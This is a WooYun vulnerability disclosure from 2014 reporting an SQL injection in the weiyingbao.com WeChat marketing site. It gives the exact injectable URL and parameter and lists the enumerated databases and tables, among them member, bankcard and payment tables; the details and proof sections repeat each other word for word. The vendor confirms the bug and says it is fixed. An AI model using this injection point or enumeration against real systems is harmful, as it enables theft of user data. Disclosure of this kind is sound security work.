漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-082653
漏洞标题:微赢宝某站sql整站数据泄露(33W用户数据告急)
相关厂商:weiyingbao.com
漏洞作者: 路人甲
提交时间:2014-11-14 12:00
修复时间:2014-12-29 12:02
公开时间:2014-12-29 12:02
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-17: 厂商已经确认,细节仅向厂商公开
2014-11-27: 细节向核心白帽子及相关领域专家公开
2014-12-07: 细节向普通白帽子公开
2014-12-17: 细节向实习白帽子公开
2014-12-29: 细节向公众公开
简要描述:
微信营销专家的微赢宝注入漏洞,整站数据可拿
详细说明:
注入点:http://i.weiyingbao.com/home.php?app=store&id=67566&vote_id=*&act=show_vote_lists (GET)
数据库:
[*] i_wyb
[*] information_schema
[*] mp
[*] mp.weiyingbao
[*] mp01new
[*] mptest1_1
[*] mysql
[*] phpmyadmin
[*] test
[*] v.weiyingbao
[*] web.weiyingbao
[*] weixin
[*] wyb
wyb 数据库内的表
+----------------------------+
| wyb_acategory |
| wyb_activity |
| wyb_address |
| wyb_agent |
| wyb_agent_area |
| wyb_agent_paylog |
| wyb_agent_recharge |
| wyb_app_store |
| wyb_article |
| wyb_atlas |
| wyb_atlas_category |
| wyb_bankcard |
| wyb_banner_group |
| wyb_book |
| wyb_book_user |
| wyb_brand |
| wyb_cart |
| wyb_category_goods |
| wyb_category_store |
| wyb_collect |
| wyb_com_activity |
| wyb_coupon |
| wyb_coupon_sn |
| wyb_course |
| wyb_course_forum |
| wyb_course_forum_reply |
| wyb_data_day |
| wyb_data_total |
| wyb_ecoupon |
| wyb_enroll |
| wyb_enroll_online |
| wyb_feedback |
| wyb_finance |
| wyb_form_data |
| wyb_form_field |
| wyb_form_list |
| wyb_friend |
| wyb_gcategory |
| wyb_goods |
| wyb_goods_attr |
| wyb_goods_image |
| wyb_goods_qa |
| wyb_goods_spec |
| wyb_goods_statistics |
| wyb_groupbuy |
| wyb_groupbuy_log |
| wyb_inleader |
| wyb_inleader_banner |
| wyb_inleader_printer |
| wyb_inleader_user |
| wyb_invitation |
| wyb_invitation_batch |
| wyb_invitation_code |
| wyb_invitation_reply |
| wyb_invitation_user |
| wyb_lbs |
| wyb_leave_name |
| wyb_lottery |
| wyb_lottery_award |
| wyb_lottery_cate |
| wyb_lottery_record |
| wyb_lottery_win |
| wyb_mail_queue |
| wyb_member |
| wyb_member_coupon |
| wyb_message |
| wyb_module |
| wyb_navigation |
| wyb_order |
| wyb_order_extm |
| wyb_order_goods |
| wyb_order_log |
| wyb_pageview |
| wyb_param_qrcode |
| wyb_partner |
| wyb_payment |
| wyb_privilege |
| wyb_promotion |
| wyb_promotion_grade |
| wyb_re_url |
| wyb_recommend |
| wyb_recommend_goods |
| wyb_region |
| wyb_review |
| wyb_role |
| wyb_role_user |
| wyb_scan_log |
| wyb_scategory |
| wyb_scene_3d |
| wyb_sessions |
| wyb_sessions_data |
| wyb_sgrade |
| wyb_shake |
| wyb_shipping |
| wyb_shop_communications |
| wyb_single |
| wyb_spike |
| wyb_spike_count |
| wyb_spike_goods |
| wyb_statistics |
| wyb_store |
| wyb_store_banner |
| wyb_store_bg |
| wyb_store_theme |
| wyb_store_tpl_bg |
| wyb_student |
| wyb_sub_store |
| wyb_temp |
| wyb_template_config |
| wyb_template_image |
| wyb_uploaded_file |
| wyb_user_coupon |
| wyb_user_priv |
| wyb_vip_add_reduce_remark |
| wyb_vipcard |
| wyb_vipcard_grade |
| wyb_vipcard_manage |
| wyb_vote |
| wyb_vote_record |
| wyb_vote_select |
| wyb_wei_survey_answer |
| wyb_weixin_attention |
| wyb_weixin_content |
| wyb_weixin_key_rule |
| wyb_weixin_keyword |
| wyb_weixin_menu |
| wyb_weixin_msg |
| wyb_weixin_music |
| wyb_weixin_mykey |
| wyb_weixin_send_message |
| wyb_weixin_service |
| wyb_weixin_service_chat |
| wyb_weixin_service_message |
| wyb_weixin_user |
| wyb_weixin_user_group |
| wyb_weixin_user_message |
| wyb_weixin_wall_member |
| wyb_weixin_wall_message |
| wyb_weixin_wall_replay |
| wyb_wphoto_link |
| wyb_wphoto_material |
| wyb_wphoto_qrcode |
+----------------------------+
其他数据库内表结构基本一样
查一下数据量
漏洞证明:
注入点:http://i.weiyingbao.com/home.php?app=store&id=67566&vote_id=*&act=show_vote_lists (GET)
数据库:
[*] i_wyb
[*] information_schema
[*] mp
[*] mp.weiyingbao
[*] mp01new
[*] mptest1_1
[*] mysql
[*] phpmyadmin
[*] test
[*] v.weiyingbao
[*] web.weiyingbao
[*] weixin
[*] wyb
wyb 数据库内的表
+----------------------------+
| wyb_acategory |
| wyb_activity |
| wyb_address |
| wyb_agent |
| wyb_agent_area |
| wyb_agent_paylog |
| wyb_agent_recharge |
| wyb_app_store |
| wyb_article |
| wyb_atlas |
| wyb_atlas_category |
| wyb_bankcard |
| wyb_banner_group |
| wyb_book |
| wyb_book_user |
| wyb_brand |
| wyb_cart |
| wyb_category_goods |
| wyb_category_store |
| wyb_collect |
| wyb_com_activity |
| wyb_coupon |
| wyb_coupon_sn |
| wyb_course |
| wyb_course_forum |
| wyb_course_forum_reply |
| wyb_data_day |
| wyb_data_total |
| wyb_ecoupon |
| wyb_enroll |
| wyb_enroll_online |
| wyb_feedback |
| wyb_finance |
| wyb_form_data |
| wyb_form_field |
| wyb_form_list |
| wyb_friend |
| wyb_gcategory |
| wyb_goods |
| wyb_goods_attr |
| wyb_goods_image |
| wyb_goods_qa |
| wyb_goods_spec |
| wyb_goods_statistics |
| wyb_groupbuy |
| wyb_groupbuy_log |
| wyb_inleader |
| wyb_inleader_banner |
| wyb_inleader_printer |
| wyb_inleader_user |
| wyb_invitation |
| wyb_invitation_batch |
| wyb_invitation_code |
| wyb_invitation_reply |
| wyb_invitation_user |
| wyb_lbs |
| wyb_leave_name |
| wyb_lottery |
| wyb_lottery_award |
| wyb_lottery_cate |
| wyb_lottery_record |
| wyb_lottery_win |
| wyb_mail_queue |
| wyb_member |
| wyb_member_coupon |
| wyb_message |
| wyb_module |
| wyb_navigation |
| wyb_order |
| wyb_order_extm |
| wyb_order_goods |
| wyb_order_log |
| wyb_pageview |
| wyb_param_qrcode |
| wyb_partner |
| wyb_payment |
| wyb_privilege |
| wyb_promotion |
| wyb_promotion_grade |
| wyb_re_url |
| wyb_recommend |
| wyb_recommend_goods |
| wyb_region |
| wyb_review |
| wyb_role |
| wyb_role_user |
| wyb_scan_log |
| wyb_scategory |
| wyb_scene_3d |
| wyb_sessions |
| wyb_sessions_data |
| wyb_sgrade |
| wyb_shake |
| wyb_shipping |
| wyb_shop_communications |
| wyb_single |
| wyb_spike |
| wyb_spike_count |
| wyb_spike_goods |
| wyb_statistics |
| wyb_store |
| wyb_store_banner |
| wyb_store_bg |
| wyb_store_theme |
| wyb_store_tpl_bg |
| wyb_student |
| wyb_sub_store |
| wyb_temp |
| wyb_template_config |
| wyb_template_image |
| wyb_uploaded_file |
| wyb_user_coupon |
| wyb_user_priv |
| wyb_vip_add_reduce_remark |
| wyb_vipcard |
| wyb_vipcard_grade |
| wyb_vipcard_manage |
| wyb_vote |
| wyb_vote_record |
| wyb_vote_select |
| wyb_wei_survey_answer |
| wyb_weixin_attention |
| wyb_weixin_content |
| wyb_weixin_key_rule |
| wyb_weixin_keyword |
| wyb_weixin_menu |
| wyb_weixin_msg |
| wyb_weixin_music |
| wyb_weixin_mykey |
| wyb_weixin_send_message |
| wyb_weixin_service |
| wyb_weixin_service_chat |
| wyb_weixin_service_message |
| wyb_weixin_user |
| wyb_weixin_user_group |
| wyb_weixin_user_message |
| wyb_weixin_wall_member |
| wyb_weixin_wall_message |
| wyb_weixin_wall_replay |
| wyb_wphoto_link |
| wyb_wphoto_material |
| wyb_wphoto_qrcode |
+----------------------------+
其他数据库内表结构基本一样
查一下数据量
修复方案:
都懂
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2014-11-17 14:23
厂商回复:
非常感谢,已修复
最新状态:
暂无